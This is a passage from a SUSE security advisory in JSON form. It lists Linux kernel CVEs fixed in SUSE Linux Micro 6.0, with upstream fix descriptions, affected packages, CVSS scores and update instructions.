"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54017"
},
{
"cve": "CVE-2023-54019",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54019"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/psi: use kernfs polling functions for PSI trigger polling\n\nDestroying psi trigger in cgroup_file_release causes UAF issues when\na cgroup is removed from under a polling process. This is happening\nbecause cgroup removal causes a call to cgroup_file_release while the\nactual file is still alive. Destroying the trigger at this point would\nalso destroy its waitqueue head and if there is still a polling process\non that file accessing the waitqueue, it will step on the freed pointer:\n\ndo_select\n vfs_poll\n do_rmdir\n cgroup_rmdir\n kernfs_drain_open_files\n cgroup_file_release\n cgroup_pressure_release\n psi_trigger_destroy\n wake_up_pollfree(\u0026t-\u003eevent_wait)\n// vfs_poll is unblocked\n synchronize_rcu\n kfree(t)\n poll_freewait -\u003e UAF access to the trigger\u0027s waitqueue head\n\nPatch [1] fixed this issue for epoll() case using wake_up_pollfree(),\nhowever the same issue exists for synchronous poll() case.\nThe root cause of this issue is that the lifecycles of the psi trigger\u0027s\nwaitqueue and of the file associated with the trigger are different. Fix\nthis by using kernfs_generic_poll function when polling on cgroup-specific\npsi triggers. It internally uses kernfs_open_node-\u003epoll waitqueue head\nwith its lifecycle tied to the file\u0027s lifecycle. This also renders the\nfix in [1] obsolete, so revert it.\n\n[1] commit c2dbe32d5db5 (\"sched/psi: Fix use-after-free in ep_remove_wait_queue()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54019",
"url": "https://www.suse.com/security/cve/CVE-2023-54019"
},
{
"category": "external",
"summary": "SUSE Bug 1255636 for CVE-2023-54019",
"url": "https://bugzilla.suse.com/1255636"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54019"
},
{
"cve": "CVE-2023-54022",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54022"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix potential memory leaks at error path for UMP open\n\nThe allocation and initialization errors at alloc_midi_urbs() that is\ncalled at MIDI 2.0 / UMP device are supposed to be handled at the\ncaller side by invoking free_midi_urbs(). However, free_midi_urbs()\nloops only for ep-\u003enum_urbs entries, and since ep-\u003enum_entries wasn\u0027t\nupdated yet at the allocation / init error in alloc_midi_urbs(), this\nentry won\u0027t be released.\n\nThe intention of free_midi_urbs() is to release the whole elements, so\nchange the loop size to NUM_URBS to scan over all elements for fixing\nthe missed releases.\n\nAlso, the call of free_midi_urbs() is missing at\nsnd_usb_midi_v2_open(). Although it\u0027ll be released later at\nreopen/close or disconnection, it\u0027s better to release immediately at\nthe error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54022",
"url": "https://www.suse.com/security/cve/CVE-2023-54022"
},
{
"category": "external",
"summary": "SUSE Bug 1255545 for CVE-2023-54022",
"url": "https://bugzilla.suse.com/1255545"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54022"
},
{
"cve": "CVE-2023-54023",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54023"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race between balance and cancel/pause\n\nSyzbot reported a panic that looks like this:\n\n assertion failed: fs_info-\u003eexclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED, in fs/btrfs/ioctl.c:465\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/messages.c:259!\n RIP: 0010:btrfs_assertfail+0x2c/0x30 fs/btrfs/messages.c:259\n Call Trace:\n \u003cTASK\u003e\n btrfs_exclop_balance fs/btrfs/ioctl.c:465 [inline]\n btrfs_ioctl_balance fs/btrfs/ioctl.c:3564 [inline]\n btrfs_ioctl+0x531e/0x5b30 fs/btrfs/ioctl.c:4632\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x197/0x210 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe reproducer is running a balance and a cancel or pause in parallel.\nThe way balance finishes is a bit wonky, if we were paused we need to\nsave the balance_ctl in the fs_info, but clear it otherwise and cleanup.\nHowever we rely on the return values being specific errors, or having a\ncancel request or no pause request. If balance completes and returns 0,\nbut we have a pause or cancel request we won\u0027t do the appropriate\ncleanup, and then the next time we try to start a balance we\u0027ll trip\nthis ASSERT.\n\nThe error handling is just wrong here, we always want to clean up,\nunless we got -ECANCELLED and we set the appropriate pause flag in the\nexclusive op. With this patch the reproducer ran for an hour without\ntripping, previously it would trip in less than a few minutes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54023",
"url": "https://www.suse.com/security/cve/CVE-2023-54023"
},
{
"category": "external",
"summary": "SUSE Bug 1256301 for CVE-2023-54023",
"url": "https://bugzilla.suse.com/1256301"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54023"
},
{
"cve": "CVE-2023-54025",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54025"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rsi: Do not configure WoWlan in shutdown hook if not enabled\n\nIn case WoWlan was never configured during the operation of the system,\nthe hw-\u003ewiphy-\u003ewowlan_config will be NULL. rsi_config_wowlan() checks\nwhether wowlan_config is non-NULL and if it is not, then WARNs about it.\nThe warning is valid, as during normal operation the rsi_config_wowlan()\nshould only ever be called with non-NULL wowlan_config. In shutdown this\nrsi_config_wowlan() should only ever be called if WoWlan was configured\nbefore by the user.\n\nAdd checks for non-NULL wowlan_config into the shutdown hook. While at it,\ncheck whether the wiphy is also non-NULL before accessing wowlan_config .\nDrop the single-use wowlan_config variable, just inline it into function\ncall.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54025",
"url": "https://www.suse.com/security/cve/CVE-2023-54025"
},
{
"category": "external",
"summary": "SUSE Bug 1255558 for CVE-2023-54025",
"url": "https://bugzilla.suse.com/1255558"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54025"
},
{
"cve": "CVE-2023-54026",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54026"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nopp: Fix use-after-free in lazy_opp_tables after probe deferral\n\nWhen dev_pm_opp_of_find_icc_paths() in _allocate_opp_table() returns\n-EPROBE_DEFER, the opp_table is freed again, to wait until all the\ninterconnect paths are available.\n\nHowever, if the OPP table is using required-opps then it may already\nhave been added to the global lazy_opp_tables list. The error path\ndoes not remove the opp_table from the list again.\n\nThis can cause crashes later when the provider of the required-opps\nis added, since we will iterate over OPP tables that have already been\nfreed. E.g.:\n\n Unable to handle kernel NULL pointer dereference when read\n CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.4.0-rc3\n PC is at _of_add_opp_table_v2 (include/linux/of.h:949\n drivers/opp/of.c:98 drivers/opp/of.c:344 drivers/opp/of.c:404\n drivers/opp/of.c:1032) -\u003e lazy_link_required_opp_table()\n\nFix this by calling _of_clear_opp_table() to remove the opp_table from\nthe list and clear other allocated resources. While at it, also add the\nmissing mutex_destroy() calls in the error path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54026",
"url": "https://www.suse.com/security/cve/CVE-2023-54026"
},
{
"category": "external",
"summary": "SUSE Bug 1255549 for CVE-2023-54026",
"url": "https://bugzilla.suse.com/1255549"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54026"
},
{
"cve": "CVE-2023-54027",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54027"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: core: Prevent invalid memory access when there is no parent\n\nCommit 813665564b3d (\"iio: core: Convert to use firmware node handle\ninstead of OF node\") switched the kind of nodes to use for label\nretrieval in device registration. Probably an unwanted change in that\ncommit was that if the device has no parent then NULL pointer is\naccessed. This is what happens in the stock IIO dummy driver when a\nnew entry is created in configfs:\n\n # mkdir /sys/kernel/config/iio/devices/dummy/foo\n BUG: kernel NULL pointer dereference, address: ...\n ...\n Call Trace:\n __iio_device_register\n iio_dummy_probe\n\nSince there seems to be no reason to make a parent device of an IIO\ndummy device mandatory, let\u0027s prevent the invalid memory access in\n__iio_device_register when the parent device is NULL. With this\nchange, the IIO dummy driver works fine with configfs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54027",
"url": "https://www.suse.com/security/cve/CVE-2023-54027"
},
{
"category": "external",
"summary": "SUSE Bug 1255579 for CVE-2023-54027",
"url": "https://bugzilla.suse.com/1255579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54027"
},
{
"cve": "CVE-2023-54030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/net: don\u0027t overflow multishot recv\n\nDon\u0027t allow overflowing multishot recv CQEs, it might get out of\nhand, hurt performance, and in the worst case scenario OOM the task.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
